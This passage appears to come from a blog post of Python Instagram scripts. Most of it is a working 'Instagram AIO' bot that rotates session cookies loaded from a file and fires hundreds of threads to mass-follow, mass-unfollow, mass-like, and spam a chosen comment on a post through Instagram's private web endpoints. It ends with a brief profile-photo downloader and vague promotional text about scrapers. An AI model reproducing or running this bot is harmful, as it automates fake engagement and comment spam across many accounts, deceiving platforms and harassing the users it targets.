β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•—β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β•šβ•β•β•β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
β•šβ•β•β•šβ•β• β•šβ•β•β•β•šβ•β•β•β•β•β•    β•šβ•β•   β•šβ•β•  β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•šβ•β•      β•šβ•β•β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— 
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
β•šβ•β•  β•šβ•β•β•šβ•β• β•šβ•β•β•β•β•  """)


class Fore:
    BLACK     = "\033[30m"
    RED       = "\033[31m"
    GREEN     = "\033[32m"
    YELLOW    = "\033[33m"
    BLUE      = "\033[34m"
    MAGENTA   = "\033[35m"
    CYAN      = "\033[36m"
    WHITE     = "\033[37m"
    UNDERLINE = "\033[4m"
    RESET     = "\033[0m"


class Choose_Cookie():

    def get_cookie():
        # Read one session cookie per line from input/cookies.txt.
        with open('input/cookies.txt', 'r') as f:
            cookies = [line.strip('\n') for line in f]
        return cookies

    cookie = get_cookie()
    cookies2 = cycle(cookie)  # rotate through the cookies round-robin
    print(f"[+] Loaded {len(cookie)} cookies")

class Convert():

    
    def get_like_id(post_id):

        headers = {
            'authority': 'www.instagram.com',
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'accept-language': 'en-GB,en;q=0.9',
            'cache-control': 'max-age=0',
            'sec-ch-prefers-color-scheme': 'light',
            'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'document',
            'sec-fetch-mode': 'navigate',
            'sec-fetch-site': 'none',
            'sec-fetch-user': '?1',
            'upgrade-insecure-requests': '1',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
        }

        r = requests.get(f'https://www.instagram.com/p/{post_id}/', headers=headers)
        # The numeric media ID is embedded in the page source after "postPage_"
        media_id = r.text.split('postPage_')[1].split('"')[0]
        return media_id


    def get_user_id(username):
        
        headers = {
            'authority': 'i.instagram.com',
            'accept': '*/*',
            'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
            'origin': 'https://www.instagram.com',
            'referer': 'https://www.instagram.com/',
            'sec-ch-ua': '"Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-site',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36',
            'x-csrftoken': '2SAvFYoHgS8GwleiP7j5vTLPqRJX4IFL',
            'x-ig-app-id': '936619743392459',
        }

        params = {
            'username': username,
        }

        r = requests.get('https://i.instagram.com/api/v1/users/web_profile_info/', params=params, headers=headers)
        # The second "id" field in the response body is the numeric user ID
        user_id = r.text.split('"id":"')[2].split('"')[0]
        return user_id




class Follow():
    sem = threading.Semaphore(200)

    def follow(username):

        with Follow.sem:

            cookie = next(Choose_Cookie.cookies2)
            
            user_id = Convert.get_user_id(username)

            headers = {
                'authority': 'www.instagram.com',
                'accept': '*/*',
                'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
                'content-type': 'application/x-www-form-urlencoded',
                'cookie': f'sessionid={cookie}',
                'origin': 'https://www.instagram.com',
                'referer': f'https://www.instagram.com/{username}/',
                'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
                'sec-ch-ua-mobile': '?0',
                'sec-ch-ua-platform': '"Windows"',
                'sec-fetch-dest': 'empty',
                'sec-fetch-mode': 'cors',
                'sec-fetch-site': 'same-origin',
                'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
                'x-csrftoken': '2SAvFYoHgS8GwleiP7j5vTLPqRJX4IFL',
                'x-requested-with': 'XMLHttpRequest',
            }

            r = requests.post(f'https://www.instagram.com/web/friendships/{user_id}/follow/', headers=headers)
            if r.status_code == 200:
                print(f"{Fore.GREEN}[+] Followed{Fore.RESET} {username}\n")
            else:
                print(f"{Fore.RED}Error{Fore.RESET}\n")


    def unfollow(username):

        with Follow.sem:

            cookie = next(Choose_Cookie.cookies2)

            user_id = Convert.get_user_id(username)

            headers = {
                'authority': 'www.instagram.com',
                'accept': '*/*',
                'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
                'content-type': 'application/x-www-form-urlencoded',
                'cookie': f'sessionid={cookie}',
                'origin': 'https://www.instagram.com',
                'referer': f'https://www.instagram.com/{username}/',
                'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
                'sec-ch-ua-mobile': '?0',
                'sec-ch-ua-platform': '"Windows"',
                'sec-fetch-dest': 'empty',
                'sec-fetch-mode': 'cors',
                'sec-fetch-site': 'same-origin',
                'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
                'x-csrftoken': '2SAvFYoHgS8GwleiP7j5vTLPqRJX4IFL',
                'x-requested-with': 'XMLHttpRequest',
            }

            r = requests.post(f'https://www.instagram.com/web/friendships/{user_id}/unfollow/', headers=headers)
            print(r.status_code)
            if r.status_code == 200:
                print(f"{Fore.GREEN}[+] Unfollowed{Fore.RESET} {username}\n")
            else:
                print(f"{Fore.RED}Error{Fore.RESET}\n")



class Misc():

    def Like(post_id):

        cookie = next(Choose_Cookie.cookies2)

        like_id = Convert.get_like_id(post_id)

        headers = {
            'authority': 'www.instagram.com',
            'accept': '*/*',
            'accept-language': 'en-GB,en;q=0.9',
            'content-type': 'application/x-www-form-urlencoded',
            'cookie': f'sessionid={cookie}',
            'origin': 'https://www.instagram.com',
            'referer': f'https://www.instagram.com/p/{post_id}/',
            'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-origin',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
            'x-csrftoken': 'eB8F8DBi9fUrycehIas063lomgcrfwLS',
            'x-requested-with': 'XMLHttpRequest',
        }

        r = requests.post(f'https://www.instagram.com/web/likes/{like_id}/like/', headers=headers)
        if r.status_code == 200:
            print(f"{Fore.GREEN}[+] Liked{Fore.RESET} {post_id}\n")
        else:
            print(f"{Fore.RED}Error{Fore.RESET}\n")

    def comment(post_id, message):

        cookie = next(Choose_Cookie.cookies2)

        comment_id = Convert.get_like_id(post_id)

        headers = {
            'authority': 'www.instagram.com',
            'accept': '*/*',
            'accept-language': 'en-GB,en;q=0.9',
            'cookie': cookie,
            'origin': 'https://www.instagram.com',
            'referer': 'https://www.instagram.com/p/B-448qKlHbz/',
            'sec-ch-prefers-color-scheme': 'light',
            'sec-ch-ua': '"Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-platform': '"Windows"',
            'sec-fetch-dest': 'empty',
            'sec-fetch-mode': 'cors',
            'sec-fetch-site': 'same-origin',
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
            'viewport-width': '1083',
            'x-asbd-id': '198387',
            'x-csrftoken': 'kebImKHMQVjftn79AU80A0pqW4ugYOfA',
            'x-requested-with': 'XMLHttpRequest',
        }

        data = {
            'comment_text': message,
            'replied_to_comment_id': '',
        }

        r = requests.post(f'https://www.instagram.com/web/comments/{comment_id}/add/', headers=headers, data=data)
        print(r.text)
        if r.status_code == 200:
            print(f"{Fore.GREEN}[+] Commented{Fore.RESET} {message}\n")
        else:
            print(f"{Fore.RED}Error{Fore.RESET}\n")



os.system("cls" if os.name == "nt" else "clear")
def menu():
    os.system('title Instagram Aio ^| Made by: Hazza ^| Version: v1')
    pystyle.Write.Print("""
                        β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ•—   β–ˆβ–ˆβ–ˆβ•—β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β•šβ•β•β•β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•   β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β–ˆβ–ˆβ•‘β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β•šβ•β•β•šβ•β• β•šβ•β•β•β•šβ•β•β•β•β•β•     β•šβ•β•   β•šβ•β•  β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β•β•šβ•β•     β•šβ•β•β€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒβ€ƒ
                        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— 
                        β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—
                        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
                        β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘
                        β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
                        β•šβ•β•  β•šβ•β•β•šβ•β• β•šβ•β•β•β•β• """, pystyle.Colors.purple_to_blue, interval=0)



    print("")
    print("")
    print("")


    # print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}0{Fore.RESET} {Fore.RED}]{Fore.RESET} Account Generator')
    print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}1{Fore.RESET} {Fore.RED}]{Fore.RESET} Follow Bot')
    print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}2{Fore.RESET} {Fore.RED}]{Fore.RESET} Unfollow Bot')
    print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}3{Fore.RESET} {Fore.RED}]{Fore.RESET} Like Bot')
    print(f'                                            {Fore.RED}[{Fore.RESET} {Fore.BLUE}4{Fore.RESET} {Fore.RED}]{Fore.RESET} Comment Spammer')


    print("")
    print("")
    print("")


    choice = int(input(f"{Fore.GREEN} [{Fore.CYAN}?{Fore.GREEN}] Enter Choice {Fore.GREEN}> {Fore.WHITE}"))

    if choice == 1:
        username = input("Enter username > ")
        threads = input("Amount of follows > ")
        for i in range(int(threads)):
            threading.Thread(target=Follow.follow, args=(username,)).start()

    if choice == 2:
        username = input("Enter username > ")
        threads = input("Amount of follows > ")
        for i in range(int(threads)):
            threading.Thread(target=Follow.unfollow, args=(username,)).start()

    if choice == 3:
        post_id = input("Enter Post ID > ")
        threads = input("Amount of likes > ")
        for i in range(int(threads)):
            threading.Thread(target=Misc.Like, args=(post_id,)).start()

    if choice == 4:
        post_id = input("Enter Post ID > ")
        message = input("Enter message to spam > ")
        threads = input("Amount of comments > ")
        for i in range(int(threads)):
            threading.Thread(target=Misc.comment, args=(post_id, message,)).start()

menu()
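The `cookies2 = cycle(cookie)` line in Choose_Cookie is what spreads the load across accounts: every worker thread calls `next()` and receives the next session cookie, wrapping back to the first when the list runs out. A tiny self-contained demonstration with hypothetical cookie values:

```python
from itertools import cycle

# Hypothetical session-cookie values standing in for input/cookies.txt
cookies = cycle(["sess_a", "sess_b", "sess_c"])

picks = [next(cookies) for _ in range(5)]
print(picks)  # ['sess_a', 'sess_b', 'sess_c', 'sess_a', 'sess_b']
```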

 

Download Profile Photo:

8. Instagram scraper – for anyone who wants to get more out of their Instagram account

Instagram is a great way to share photos and videos with friends and followers, but it can be hard to get the most out of your account. One way to improve it is to use an Instagram scraper: a program that collects the photos and videos posted to an account over a specific time period. That history gives you a better understanding of your account and of what your followers are posting. A number of Instagram scraper programs are available online; choose one compatible with your computer and your account, and it will give you the data you need to improve your account.

 

import instaloader

instagram = instaloader.Instaloader()
profile = input("Enter Username: ")
instagram.download_profile(profile, profile_pic_only=True)
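The snippet above only fetches the profile picture. This section also mentions collecting the posts from a specific time period; instaloader can do that by iterating a profile's posts (newest first) and filtering on each post's timestamp. A hedged sketch — `download_posts_in_range` uses instaloader's Profile/get_posts API but needs `pip install instaloader` and a network connection, so only the pure date-filter helper runs here:

```python
from datetime import datetime

def in_range(posted: datetime, since: datetime, until: datetime) -> bool:
    # Pure helper: True when a post's timestamp falls inside [since, until].
    return since <= posted <= until

def download_posts_in_range(username: str, since: datetime, until: datetime) -> int:
    # Requires `pip install instaloader` and network access.
    import instaloader
    loader = instaloader.Instaloader()
    profile = instaloader.Profile.from_username(loader.context, username)
    count = 0
    for post in profile.get_posts():   # yielded newest first
        if post.date_utc < since:      # older than the window: stop early
            break
        if in_range(post.date_utc, since, until):
            loader.download_post(post, target=profile.username)
            count += 1
    return count
```

For example, `download_posts_in_range("some_account", datetime(2022, 1, 1), datetime(2022, 12, 31))` would save that account's 2022 posts; the username here is only a placeholder.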

 

Conclusion:

In conclusion, an Instagram scraper written in Python can extract data from Instagram posts, including images, hashtags, and user profiles, and can generate insights about post content or surface potential marketing opportunities. Instagram remains one of the most popular ways to share photos, videos, and Stories of everyday life with friends and family, which is exactly what makes it such a rich source of data for the scripts covered above.
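As a concrete instance of the hashtag extraction mentioned above, pulling hashtags out of a caption needs nothing beyond a regular expression — a minimal, self-contained sketch:

```python
import re

def extract_hashtags(caption: str) -> list[str]:
    # A hashtag is '#' followed by letters, digits, or underscores.
    return re.findall(r"#(\w+)", caption)

tags = extract_hashtags("Sunset in Lisbon #travel #sunset_2022 #nofilter")
print(tags)  # ['travel', 'sunset_2022', 'nofilter']
```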